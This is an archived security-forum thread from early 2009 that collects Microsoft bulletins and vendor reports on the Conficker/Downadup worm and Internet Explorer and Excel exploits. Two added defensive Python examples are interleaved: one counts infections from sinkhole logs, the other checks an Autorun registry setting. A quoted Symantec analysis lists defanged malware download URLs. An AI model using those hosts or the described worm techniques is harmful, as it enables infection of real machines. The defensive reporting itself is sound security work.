- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4114
- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4834
- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4835
___

MS09-001: Prioritizing the deployment of the SMB bulletin
- http://preview.tinyurl.com/8elasn
(MS Security Vulnerability Research & Defense blog) - "...In terms of prioritizing the deployment of this update, we recommend updating SMB servers and Domain Controllers immediately since a system DoS would have a high impact. Other configurations should be assessed based on the role of the machine. For example, non-critical workstations could be considered lower priority assuming a system DoS is an acceptable risk. Systems with SMB blocked at the host firewall could also be updated more slowly..."
___

MSRT - Jan.2009 additions...
- http://support.microsoft.com/?kbid=890830
Malicious software family | Tool version | Current severity rating
Win32/Banload | January 2009 (V 2.6) | Moderate
Win32/Conficker* | January 2009 (V 2.6) | High ...
* http://www.microsoft.com/security/portal/Entry.aspx?Name=Win32%2fConficker
(aka - Downadup)

Download:
- http://preview.tinyurl.com/6bb67
File Name: windows-kb890830-v2.6.exe
Version: 2.6
Date Published: 1/13/2009
___

- http://www.f-secure.com/weblog/archives/00001579.html
January 13, 2009 11:21 GMT - "... final count is: 2,395,963 infections worldwide. This figure is conservative; the real number is certainly higher."
- http://www.f-secure.com/weblog/archives/00001580.html
January 14, 2009 - "...worldwide Downadup infection count... Today's total infection count is an estimated 3,521,230 infections worldwide. That's over one million new infections since yesterday (and we still consider this to be a conservative estimate)."

:fear:

AplusWebMaster
2009-01-16, 01:14
FYI...

- http://preview.tinyurl.com/9fc4ze
January 15, 2009 (Computerworld) - "The worm that has infected several million Windows PCs is causing havoc because nearly a third of all systems remain unpatched 80 days after Microsoft Corp. rolled out an emergency fix, a security expert said today. Based on scans of several hundred thousand customer-owned Windows PCs, Qualys Inc.* concluded that about 30% of the machines have not yet been patched with the "out of cycle" fix Microsoft provided Oct. 23 as security update MS08-067..."
* http://www.qualys.com/research/alerts/view.php/2008-10-23

- http://preview.tinyurl.com/8tr9fg
January 15, 2009 (Avert Labs) - "...While investigating we found that this worm has an exploit for the recent MS08-067 vulnerability and uses the exploitation method derived from the metasploit ms08_067_netapi module to spread itself..."

NOTES:
1. It appears that this could, in part, be due to an MS Update site problem of a sort. MS08-067 was NOT offered on an XPSP2 system during the monthly update for Nov'08, nor during both of the Dec'08 runs (including the check/update for the IE 0-day fix). MS08-067 appears to have been installed during an XPSP3 update from the MS Update site just before year-end. YMMV.
2. A second XPSP2 machine - checked ReportingEvents.log located in %windir%\SoftwareDistribution ... found MS08-067 (KB958644) installed 10.23.2008, but dates shown in >Control Panel >Add/Remove programs show KB958644 install date occurred when XPSP3 was installed at year-end. WTF.

:fear: :sad: :spider:

AplusWebMaster
2009-01-16, 19:28
FYI...

- http://www.f-secure.com/weblog/archives/00001584.html
January 16, 2009 - "The number of Downadup infections is skyrocketing based on our calculations. From an estimated 2.4 million infected machines to over 8.9 million during the last four days. That's just amazing. We've received a number of queries on just how exactly we're producing our estimates. There's been interest from Internet operators, CERTs, and fellow antivirus researchers. There have also been several posts to our blog comments, doubting our numbers... So let us explain how we are generating the numbers. There are several different variants of Downadup out there. The algorithm to create the domain names varies a bit between the variants. We've been tracking the variant we believe to be most common. It creates 250 possible domains each day. We've registered some selected domains out of this pool and are monitoring the connections being made to them... We first tried to count unique User-Agent headers per IP address, but the results weren't very good as in a standardized corporate network, most machines have identical User-Agents. So, with a little digging we discovered that in the /search/q=NUMBER query, the number is not random. It's basically a global variable in the code, getting incremented (thread-safely through InterlockedIncrement) every time the malware has successfully exploited a machine via MS08-067*. The incrementation is done in the httpd thread of the malware, after it has exploited a machine successfully. So this number tells us how many other computers this machine has exploited since it was last restarted... We wrote a program that parses the logs, extracting the highest "q" value for the IP/User-Agent pairs. These are then added together to get our figures. As you can see now, they are very conservative. And they are showing more than 8 million infected machines right now. The situation with Downadup is not getting better. It's getting worse."
(Complete detail shown at the F-secure URL above.)

* http://www.microsoft.com/technet/security/Bulletin/ms08-067.mspx

:fear: :sad: :fear:
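The counting method F-Secure describes in the post above (take the highest "q" value per IP/User-Agent pair, then sum those maxima) as an added Python example. This is not F-Secure's program and not code from the original post. It assumes the sinkhole web server writes Apache-style "combined" access logs and that the callback path carries the counter as /search/q=NUMBER, as quoted above; the log lines are constructed for the example, not real sinkhole data. It goes slightly beyond the post by also returning the unique-IP and unique-pair counts that the earlier 72-hour graph compared.

```python
import re

# Constructed sample sinkhole log lines (Apache "combined" format). Not real data:
# the IPs are documentation ranges and the q values are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [16/Jan/2009:10:00:01 +0000] "GET /search/q=3 HTTP/1.1" 200 12 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
10.0.0.5 - - [16/Jan/2009:10:05:07 +0000] "GET /search/q=7 HTTP/1.1" 200 12 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
10.0.0.5 - - [16/Jan/2009:10:06:30 +0000] "GET /search/q=2 HTTP/1.1" 200 12 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
192.0.2.9 - - [16/Jan/2009:10:07:12 +0000] "GET /search/q=0 HTTP/1.1" 200 12 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
192.0.2.9 - - [16/Jan/2009:11:07:12 +0000] "GET /favicon.ico HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
203.0.113.4 - - [16/Jan/2009:11:09:55 +0000] "GET /search/q=12 HTTP/1.1" 200 12 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
"""

# Apache combined log: ip ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# The callback path shape quoted from the post; the counter is the NUMBER.
Q_RE = re.compile(r'/search/q=(\d+)')


def parse_line(line):
    """Return (ip, user_agent, q) for a callback line, or None for anything else."""
    m = LOG_RE.match(line)
    if not m:
        return None
    q = Q_RE.search(m.group('path'))
    if q is None:
        return None  # not a worm callback (e.g. favicon probes)
    return m.group('ip'), m.group('ua'), int(q.group(1))


def max_q_per_pair(log_text):
    """Highest q seen for each (ip, user_agent) pair.

    Keeping only the maximum avoids counting the same machine's repeated
    callbacks more than once: q is a running per-process counter, so the
    last value already includes the earlier ones.
    """
    highest = {}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ua, q = rec
        key = (ip, ua)
        highest[key] = max(highest.get(key, 0), q)
    return highest


def estimate(log_text):
    """Summary figures: unique IPs, unique IP/UA pairs, and the summed q counter.

    The sum is conservative, as the post says: q resets when the infected
    process restarts, and a pair that has exploited nobody contributes 0.
    """
    highest = max_q_per_pair(log_text)
    return {
        'unique_ips': len({ip for ip, _ in highest}),
        'unique_pairs': len(highest),
        'exploited_hosts': sum(highest.values()),
    }


if __name__ == '__main__':
    for key, q in sorted(max_q_per_pair(SAMPLE_LOG).items()):
        print(f'{key[0]:<14} q={q:<4} {key[1]}')
    print(estimate(SAMPLE_LOG))
```

On the constructed lines the four IP/UA pairs report maxima 7, 2, 0 and 12, so the summed counter is 21 against 3 unique IPs; the gap between the two numbers is exactly why the post switched from counting User-Agents per IP to reading the counter.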

AplusWebMaster
2009-01-20, 18:19
FYI...

- http://blog.trendmicro.com/the-mess-that-is-worm_downad/
Jan. 20, 2009 - "The North American region has the largest number of infected PCs, with users from the United States being hit the most. Japan, China, and Taiwan are also major DOWNAD-affected countries. In Europe, Italy and Spain had the most infections; however, other countries have also been affected. Users observe the following symptoms when they are infected with WORM_DOWNAD.AD:
• Blocked access to antivirus-related sites
• Disabled services such as Windows Automatic Update Service
• High traffic on affected system’s port 445
• Hidden files even after changes in Folder Options
• Inability to log in using Windows credentials because they are locked out
A .DLL file with random file names and autorun.inf also appear in all mapped drives, and in Internet Explorer and Movie Maker folders under the Program Files directory. The worm locks its dropped copy to prevent users from reading, writing, and deleting the malicious file. It also makes several registry changes to allow simultaneous network connections. By re-infecting machines, this worm manages to keep its malicious activities going on... Patching systems and programs as soon as fixes are made available and disabling autorun* are two of the most important actions required to reduce the risk of infection, infection propagation or reinfection with variant updates..."
(Global map of infections available at the URL above.)

NoDriveTypeAutoRun
* http://www.microsoft.com/technet/prodtechnol/windows2000serv/reskit/regentry/93502.mspx?mfr=true

:fear:

AplusWebMaster
2009-01-23, 18:21
FYI...

MS patch needs to be installed manually to disable -Autorun- on W2K, XP, and W2K3.
- http://preview.tinyurl.com/ck79cs
January 22, 2009 (Computerworld) - "...US-CERT said that most Windows users would have to manually go to Microsoft's Web site to grab the KB953252* update. "Note that this fix has been released via [Windows] Update to Windows Vista and Server 2008 systems as part of the MS08-038 Security Bulletin," said the security organization, talking about a July 2008 patch. "Windows 2000, XP and Server 2003 users must install the update manually." Microsoft has -not- issued the KB953252 update to Windows 2000, XP or Server 2003 systems via Windows Update or the corporate-oriented Windows Server Update Services (WSUS). US-CERT confirmed that the KB953252 update -does- fix the bug it had pointed out the day before**. "Our testing has shown that installing this update -and- setting the NoDriveTypeAutoRun registry value to 0xFF -will- disable Autorun," said US-CERT..."

* http://support.microsoft.com/kb/953252

** http://www.us-cert.gov/cas/techalerts/TA09-020A.html
Last revised: January 21, 2009: Added reference and details for Microsoft KB953252

- http://www.secureworks.com/research/threats/downadup-removal/
"...F-Secure also has a removal tool available, however the f-secure.com domain is in the blocked list of domain names (per infection)... Using an IP address instead of the hostname will bypass the worm's blocking routines, so that tool could be downloaded by infected systems at this URL: ftp://193.110.109.53/anti-virus/tools/beta/f-downadup.zip ..."

:fear: :rolleyes:

AplusWebMaster
2009-01-27, 17:25
FYI...

- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0243
Last revised:01/22/2009
CVSS v2 Base Score:7.2 (HIGH)
Overview: Microsoft Windows does not properly enforce the Autorun and NoDriveTypeAutoRun registry values, which allows physically proximate attackers to execute arbitrary code...

- http://www.us-cert.gov/cas/techalerts/TA09-020A.html
Last revised: January 21, 2009

- http://isc.sans.org/diary.html?storyid=5695
Last Updated: 2009-01-15 08:38:46 UTC

:fear:

AplusWebMaster
2009-01-30, 19:07
FYI...

Preemptive Downadup blocklist for February 2009
- http://www.f-secure.com/weblog/archives/00001593.html
January 30, 2009 - "... new list of potential domains for the month of February. The list reflects what we think to be the most common variant of Downadup in-the-wild..."
* http://www.f-secure.com/weblog/archives/Downadup_Domain_Blocklist_February.txt

:fear::mad::fear:

AplusWebMaster
2009-02-04, 00:23
FYI...

Microsoft Security Bulletin MS08-037 – Important
Vulnerabilities in DNS Could Allow Spoofing (953230)
- http://www.microsoft.com/technet/security/bulletin/ms08-037.mspx
Published: July 8, 2008
...Why was this security bulletin revised on January 13, 2009?
Microsoft revised this bulletin to communicate that the update offered by this bulletin may -not- have been correctly offered to all systems running Windows XP SP3. The detection and deployment issue has been fixed, and customers with Windows XP Service Pack 3 systems who have not already applied the update from this bulletin will now be correctly offered the update...
• V2.3 (January 13, 2009): Added a new entry to the Frequently Asked Questions (FAQ) Related to This Security Update section to communicate the fix to a detection and deployment issue with Windows XP Service Pack 3. There were no changes to the binaries or packages for this update. Customers who have successfully updated their systems do not need to reinstall this update.

Ed. note: 'Makes one wonder if the same was true for MS08-067...

:sad:

AplusWebMaster
2009-02-07, 09:53
FYI...

Protect Your Network from Conficker
- http://technet.microsoft.com/en-us/security/dd452420.aspx
February 6, 2009 - "This page aims to help customers by providing consolidated information about Conficker that customers can use to protect their systems and with which to recover systems that have been infected..."

("Related Links" also available at the URL above.)

:fear:

AplusWebMaster
2009-02-08, 14:37
FYI...

OpenDNS to roll out Conficker tracking - blocking
- http://www.theregister.co.uk/2009/02/07/opendns_conficker_protection/
7 February 2009 21:32 GMT - "With an estimated 10 million PCs infected by the stealthy worm known as Conficker, it's a good bet that plenty of administrators are blissfully unaware that their networks are playing host to the pest. Now, a free service called OpenDNS* is offering a new feature designed to alert administrators to the damage and help them contain it.
The company on Monday plans to introduce an addition to its offerings that makes it easy for admins to know if even a single machine has been infected by Conficker. The service will also automatically protect infected machines by preventing them from connecting to rogue servers controlled by the malware authors... Without the service, admins would have to manually block 1,750 domains each week, or 91,250 each year. The service will also help network admins to quickly pinpoint any infected machines by checking their OpenDNS Dashboard. Starting Monday, any networks with PCs that try to connect to the Conficker addresses will be flagged on an admin's private statistics page. The service is available for free to both businesses and home users... The service is first offered under a new botnet protection service being rolled out by OpenDNS... The list of blocked domains is being provided by anti-virus provider Kaspersky, which reverse-engineered Conficker so it could preemptively predict the new sites that will be used each day."
* https://www.opendns.com/homenetwork/start/

- http://blog.opendns.com/2009/02/09/stats-are-back-and-conficker/
Feb 9, 2009

- http://www.shadowserver.org/wiki/pmwiki.php?n=Stats.Sinkholes
February 16, 2009

:bigthumb:

AplusWebMaster
2009-02-10, 20:57
FYI...

- http://www.microsoft.com/technet/security/bulletin/ms09-feb.mspx
February 10, 2009 - "This bulletin summary lists security bulletins released for February 2009... (-4-)

Critical -2-

Microsoft Security Bulletin MS09-002
Cumulative Security Update for Internet Explorer (961260)
- http://www.microsoft.com/technet/security/bulletin/ms09-002.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows, Internet Explorer

Microsoft Security Bulletin MS09-003
Vulnerabilities in Microsoft Exchange Could Allow Remote Code Execution (959239)
- http://www.microsoft.com/technet/security/bulletin/ms09-003.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Exchange Server

Important -2-

Microsoft Security Bulletin MS09-004
Vulnerability in Microsoft SQL Server Could Allow Remote Code Execution (959420)
- http://www.microsoft.com/technet/security/bulletin/ms09-004.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft SQL Server
- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5416
Last revised:02/12/2009
CVSS v2 Base Score: 9.0 (HIGH)

Microsoft Security Bulletin MS09-005
Vulnerabilities in Microsoft Office Visio Could Allow Remote Code Execution (957634)
- http://www.microsoft.com/technet/security/bulletin/ms09-005.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Office
___

ISC Analysis
- http://isc.sans.org/diary.html?storyid=5836
Last Updated: 2009-02-10 18:59:20 UTC

.

AplusWebMaster
2009-02-11, 13:06
FYI...

MS Security Bulletin MS08-070 - Critical
Vulnerabilities in Visual Basic 6.0 Runtime Extended Files (ActiveX Controls) Could Allow Remote Code Execution (932349)
- http://www.microsoft.com/technet/security/Bulletin/ms08-070.mspx
Updated: February 10, 2009 - This security update resolves five privately reported vulnerabilities and one publicly disclosed vulnerability in the ActiveX controls for the Microsoft Visual Basic 6.0 Runtime Extended Files. These vulnerabilities could allow remote code execution if a user browsed a Web site that contains specially crafted content. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights...

...Further details can be found in the security release issued by Akamai:
- http://www.akamai.com/html/support/security.html

...Further details can be found in the security release issued by RIM:
- http://www.blackberry.com/btsc/search.do?cmd=displayKC&docType=kc&externalId=KB16248

• V1.2 (February 10, 2009): Clarified the class IDs for two ActiveX controls.
First, listed a second class ID in the workaround, "Prevent Windows Common AVI ActiveX Control from running in Internet Explorer," for CVE-2008-4255.
Second, listed in the section, Frequently asked questions (FAQ) related to this security update, the class ID for the Winsock Control for which the kill bit is being set as a security-related change to functionality in this update. This is an informational change only. There were no changes to the security update files in this bulletin.

//

Microsoft Security Advisory (960715)
Update Rollup for ActiveX Kill Bits
- http://www.microsoft.com/technet/security/advisory/960715.mspx
Published: February 10, 2009 - "Microsoft is releasing a new set of ActiveX kill bits with this advisory. The update includes kill bits for previously published Microsoft security bulletins:
• MS08-070 - Critical
Vulnerabilities in Visual Basic 6.0 Runtime Extended Files (ActiveX Controls) Could Allow Remote Code Execution (932349)
- http://www.microsoft.com/technet/security/Bulletin/ms08-070.mspx
For more information about installing this update, see:
Update Rollup for ActiveX Kill Bits
- http://support.microsoft.com/kb/960715
February 10, 2009

:fear:

AplusWebMaster
2009-02-12, 05:16
FYI...

MSRT February 2009 - Win32/Srizbi
- http://preview.tinyurl.com/d59enk
February 10, 2009 Microsoft Malware Protection Center - "This month's MSRT takes on one of the largest botnets currently active worldwide – Win32/Srizbi. The Srizbi family of malware consists of trojan droppers and rootkits that often spread through spam e-mails containing download links to the malware. Much like its alleged close cousin Win32/Rustock (which is removed by the MSRT since Oct 2008), the Srizbi family of malware was developed mainly for the purpose of spam-for-hire operations. The Srizbi malware authors offer the botnet as an efficient method of sending spam e-mails for any organization who would stoop low enough to utilize this mechanism for advertising their intent..."
> http://www.microsoft.com/security/malwareremove/default.mspx

:fear: :bigthumb:

AplusWebMaster
2009-02-17, 19:34
FYI...

- http://blog.trendmicro.com/another-exploit-targets-ie7-bug/
Feb. 17, 2009 - "Cybercriminals are actively exploiting a critical vulnerability in Internet Explorer 7, which arises from the browser’s improper handling of errors when attempting to access deleted objects. This vulnerability allows remote attackers to execute arbitrary code on a vulnerable machine. The threat starts with a spammed malicious .DOC file detected as XML_DLOADR.A. This file has a very limited distribution script, suggesting it may be a targeted attack. It contains an ActiveX object that automatically accesses a site rigged with a malicious HTML detected by the Trend Micro Smart Protection Network as HTML_DLOADER.AS. HTML_DLOADER.AS exploits the CVE-2009-0075* vulnerability, which is already addressed by the MS09-002** security patch released last week. On an unpatched system though, successful exploitation by HTML_DLOADER.AS downloads a backdoor detected as BKDR_AGENT.XZMS. This backdoor further installs a .DLL file that has information stealing capabilities. It sends its stolen information to another URL via port 443... Our engineers are still working on the details of this threat. We will post updates as soon as more information becomes available..."
* http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0075
Last revised: 02/17/2009

** http://www.microsoft.com/technet/security/Bulletin/MS09-002.mspx

- http://isc.sans.org/diary.html?storyid=5884
Last Updated: 2009-02-17 19:55:10 UTC - "...there is absolutely nothing preventing attackers from using the exploit in a drive-by attack (and we can, unfortunately, expect that this will happen very soon)..."

- http://www.us-cert.gov/current/#malware_exploiting_microsoft_internet_explorer
February 17, 2009

:fear: :spider: :fear:

AplusWebMaster
2009-02-19, 22:51
FYI...

- http://vrt-sourcefire.blogspot.com/2009/02/ms09-002-in-wild.html
February 18, 2009 - "Yesterday we came across a website taking advantage of a programming error in Internet Explorer that allows a remote attacker to execute code on a vulnerable system. Microsoft issued an advisory (MS09-002) on February 10, 2009 and released a patch on the same day to mitigate the problem. We released same-day coverage for this and other vulnerabilities*... Upon visiting the compromised page with Internet Explorer 7 on a vulnerable machine, a malicious script is executed, which in turn downloads an executable on the system before crashing the web browser...
UPDATE: As of 11AM EST on Feb 19, 2009, another Chinese website is leveraging MS09-002 to push malware to victims..."
* http://www.snort.org/vrt/advisories/vrt-rules-2009-02-10.html
'Better known as "Drive-by malware"...
________________________________________

Cumulative Security Update for Internet Explorer - Extreme Severity
- http://atlas.arbor.net/briefs/
February 23, 2009 - "...key issues to address for -all- users of IE7. We have seen this used in targeted attacks and now exploit kits that target indiscriminately."
* http://www.microsoft.com/technet/security/bulletin/ms09-002.mspx

:fear::mad:

AplusWebMaster
2009-02-25, 00:56
FYI...

Microsoft Security Advisory (968272)
Vulnerability in Microsoft Office Excel Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/968272.mspx
February 24, 2009 - "Microsoft is investigating new public reports of a vulnerability in Microsoft Office Excel that could allow remote code execution if a user opens a specially crafted Excel file. At this time, we are aware only of limited and targeted attacks that attempt to use this vulnerability...
• Users who have installed and are using the Office Document Open Confirmation Tool* for Office 2000 will be prompted with Open, Save, or Cancel before opening a document.
* http://www.microsoft.com/downloads/details.aspx?familyid=8B5762D2-077F-4031-9EE6-C9538E9F2A2F

- http://www.securityfocus.com/bid/33870/exploit
"Symantec has detected active in-the-wild exploit attempts. This issue is detected as 'Trojan.Mdropper.AC'**

Trojan.Mdropper.AC
** http://preview.tinyurl.com/dbz42c
Updated: February 24, 2009 - "Systems Affected: Windows Vista, Windows XP
When the Trojan executes, it may exploit the Microsoft Excel Unspecified Remote Code Execution Vulnerability (BID 33870).
It then drops the following file: %Temp%\rundll.exe (a copy of Downloader)
The Trojan may then attempt to download more files on to the compromised computer from the following locations:
* [http://]61. 59.24.55 /sb.php?id=[19 RANDOM ASCII CHARACTERS]
* [http://]61. 59.24.45 /sb.php?id=[19 RANDOM ASCII CHARACTERS]
* [http://]61. 221.40.63 /sb.php?id=[19 RANDOM ASCII CHARACTERS] ..."

:fear::fear:

AplusWebMaster
2009-02-25, 18:18
FYI...

MS AutoRun fix for XP, W2K, W2K3 released...
- http://preview.tinyurl.com/cqtxcd
February 24, 2009 Computerworld - "Microsoft is pushing out a software update to some Windows users that fixes a bug in the Windows AutoRun software, used to automatically launch programs when DVDs or USB devices are introduced to the PC... the widespread Conficker worm uses AutoRun to spread from USB devices to PCs... (MS) had also pushed out a July update that fixed the problem for Vista and Server 2008*; but this fix** was -not- automatically updated for Windows 2000, XP and Server 2003 users..."

* http://www.microsoft.com/technet/security/Bulletin/MS08-038.mspx

How to correct "disable Autorun registry key" enforcement in Windows
** http://support.microsoft.com/kb/967715
February 24, 2009

- http://isc.sans.org/diary.html?storyid=5938
Last Updated: 2009-02-26 20:46:47 UTC ...(Version: 2)
"...XP home can't run gpedit.msc. XP home users need to follow the "How to selectively disable specific autorun features" steps. I recommend you modify the NoDriveTypeAutoRun value to 0xFF. That should disable autorun on ALL drives."

:fear::fear:

AplusWebMaster
2009-02-27, 20:39
FYI...

Microsoft Security Advisory (967940)
Update for Windows Autorun
- http://www.microsoft.com/technet/security/advisory/967940.mspx
02/24/2009 - "Microsoft is announcing the availability of an update that corrects a functionality feature that can help customers in keeping their systems protected. The update corrects an issue that prevents the NoDriveTypeAutoRun registry key from functioning as expected. When functioning as expected, the NoDriveTypeAutoRun registry key can be used to selectively disable Autorun functionality (e.g. AutoPlay, double click, and contextual menu features associated with Autorun) for drives on a user's system and network. Disabling Autorun functionality can help protect customers from attack vectors that involve the execution of arbitrary code by Autorun when inserting a CD-ROM device, USB device, network shares, or other media containing a file system with an Autorun.inf file. We encourage Windows customers to review and install this update. This update is available through automatic updating and from the download center. For more information about this issue, including download links for this non-security update, see Microsoft Knowledge Base Article 967715*."
* http://support.microsoft.com/kb/967715

:fear::fear:
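A defender's check for the NoDriveTypeAutoRun value that this advisory, the ISC diary and the US-CERT alert above all turn on, as an added Python example; it is not Microsoft's code and not taken from any of the quoted posts. It reads a registry export in the .reg text format (what `reg export` or Regedit produce), finds the value under the two standard Policies\Explorer locations, and decodes the bitmask with the drive-type bits that the KB967715 table documents for it, reporting which drive types still have Autorun enabled. The export text is constructed for the example (the 0x91 and 0xFF values are sample settings, not a claim about any machine's defaults), and the check is offline: as the advisory says, the value only works as expected once the KB967715 update (or KB953252 as described earlier) is installed, which a registry export cannot tell you.

```python
import re

# NoDriveTypeAutoRun is a bitmask: bit n disables Autorun for the drive type that
# GetDriveType() reports as n. Descriptions follow the table in KB967715.
DRIVE_BITS = {
    0x01: "unknown type",
    0x02: "no root directory",
    0x04: "removable (USB sticks, floppies)",
    0x08: "fixed (local hard disks)",
    0x10: "network (mapped drives)",
    0x20: "CD-ROM / DVD",
    0x40: "RAM disk",
    0x80: "reserved / unknown type",
}
DISABLE_ALL = 0xFF  # the value US-CERT and ISC recommend in the posts above

# The two policy locations the value is read from (machine-wide and per-user).
REG_KEYS = (
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer",
    r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer",
)

# Constructed .reg export (not from a real machine): the machine-wide value is a
# partial setting of 0x91, the per-user value is the recommended 0xFF.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDriveTypeAutoRun"=dword:00000091
"NoDriveAutoRun"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDriveTypeAutoRun"=dword:000000ff
"""

KEY_RE = re.compile(r'^\[(?P<key>[^\]]+)\]$')
DWORD_RE = re.compile(r'^"(?P<name>[^"]+)"=dword:(?P<hex>[0-9a-fA-F]{8})$')


def parse_reg_export(text):
    """Return {key_path_lowercased: {value_name: int}} for the DWORD values in a .reg export.

    Key paths are lowercased because the registry is case-insensitive and
    exports show whatever casing the key was created with.
    """
    values, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        m = KEY_RE.match(line)
        if m:
            current = m.group('key').lower()
            values.setdefault(current, {})
            continue
        m = DWORD_RE.match(line)
        if m and current is not None:
            values[current][m.group('name')] = int(m.group('hex'), 16)
    return values


def autorun_still_allowed(value):
    """Drive types whose Autorun is NOT disabled by this bitmask."""
    return [desc for bit, desc in DRIVE_BITS.items() if not value & bit]


def assess(reg_text):
    """Per policy location: the value found, whether it is 0xFF, and what remains exposed.

    A missing value means the OS default applies; it is reported as not
    hardened (fully_disabled False) with no drive-type breakdown.
    """
    parsed = parse_reg_export(reg_text)
    report = {}
    for key in REG_KEYS:
        value = parsed.get(key.lower(), {}).get("NoDriveTypeAutoRun")
        if value is None:
            report[key] = {"value": None, "fully_disabled": False,
                           "autorun_still_allowed": None}
            continue
        report[key] = {
            "value": value,
            "fully_disabled": (value & DISABLE_ALL) == DISABLE_ALL,
            "autorun_still_allowed": autorun_still_allowed(value),
        }
    return report


if __name__ == "__main__":
    for key, info in assess(SAMPLE_REG).items():
        shown = "not set" if info["value"] is None else f"0x{info['value']:02X}"
        print(f"{key}\n  NoDriveTypeAutoRun = {shown}; fully disabled: {info['fully_disabled']}")
        for desc in info["autorun_still_allowed"] or []:
            print(f"  Autorun still enabled for: {desc}")
```

On the constructed export the machine-wide 0x91 still leaves removable, fixed, CD-ROM, RAM-disk and no-root-directory drives with Autorun enabled, which is exactly the USB-stick and mapped-drive path the Conficker posts describe, while the per-user 0xFF covers every type. Run it against a real export with `assess(open("explorer-policies.reg", encoding="utf-16").read())`, since Regedit writes UTF-16 files.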

AplusWebMaster
2009-03-10, 19:42
FYI...

- http://www.microsoft.com/technet/security/Bulletin/MS09-mar.mspx
March 10, 2009 - "This bulletin summary lists security bulletins released for March 2009...

Critical -1-

Microsoft Security Bulletin MS09-006 – Critical
Vulnerabilities in Windows Kernel Could Allow Remote Code Execution (958690)
- http://www.microsoft.com/technet/security/bulletin/MS09-006.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...
Executive Summary: This security update resolves several privately reported vulnerabilities in the Windows kernel. The most serious vulnerability could allow remote code execution if a user viewed a specially crafted EMF or WMF image file from an affected system. This security update is rated Critical for all supported editions of Microsoft Windows 2000, Windows XP, Windows Server 2003, Windows Vista, and Windows Server 2008...
CVE-2009-0081, CVE-2009-0082, CVE-2009-0083

Important -2-

Microsoft Security Bulletin MS09-007 - Important
Vulnerability in SChannel Could Allow Spoofing (960225)
- http://www.microsoft.com/technet/security/bulletin/MS09-007.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...
Executive Summary: This security update resolves a privately reported vulnerability in the Secure Channel (SChannel) security package in Windows. The vulnerability could allow spoofing if an attacker gains access to the certificate used by the end user for authentication. Customers are only affected when the public key component of the certificate used for authentication has been obtained by the attacker through other means. This security update is rated Important for all supported editions of Microsoft Windows 2000, Windows XP, Windows Server 2003, Windows Vista, and Windows Server 2008...
CVE-2009-0085

Microsoft Security Bulletin MS09-008 – Important
Vulnerabilities in DNS and WINS Server Could Allow Spoofing (962238)
- http://www.microsoft.com/technet/security/bulletin/MS09-008.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...
Executive Summary: This security update resolves two privately reported vulnerabilities and two publicly disclosed vulnerabilities in Windows DNS server and Windows WINS server. These vulnerabilities could allow a remote attacker to redirect network traffic intended for systems on the Internet to the attacker’s own systems. This security update is rated Important for all supported editions of Microsoft Windows 2000 Server, Windows Server 2003, and Windows Server 2008...
CVE-2009-0093, CVE-2009-0094, CVE-2009-0233, CVE-2009-0234
___

Malicious Software Removal Tool
- http://www.microsoft.com/security/malwareremove/default.mspx
File Name: windows-kb890830-v2.8.exe
Version: 2.8
Knowledge Base (KB) Articles: http://support.microsoft.com/?kbid=890830
Date Published: 3/10/2009
___

ISC Analysis
- http://isc.sans.org/diary.html?storyid=5995
Last Updated: 2009-03-10 17:48:31 UTC

AplusWebMaster
2009-03-11, 10:08
Revised...

Microsoft Security Bulletin MS08-052 – Critical
Vulnerabilities in GDI+ Could Allow Remote Code Execution (954593)
- http://www.microsoft.com/technet/security/bulletin/ms08-052.mspx
Updated: March 10, 2009
• V4.0 (March 10, 2009): Added entry in the Frequently Asked Questions (FAQ) Related to this Security Update section to communicate the rerelease of the update packages for Windows XP Service Pack 3 and Windows Server 2003 Service Pack 2 to fix an installation issue. Customers who have already successfully installed the original updates for Windows XP Service Pack 3 or Windows Server 2003 Service Pack 2 do not need to reinstall the new updates.

:fear:

AplusWebMaster
2009-03-13, 12:31
FYI...

- http://isc.sans.org/diary.html?storyid=6010
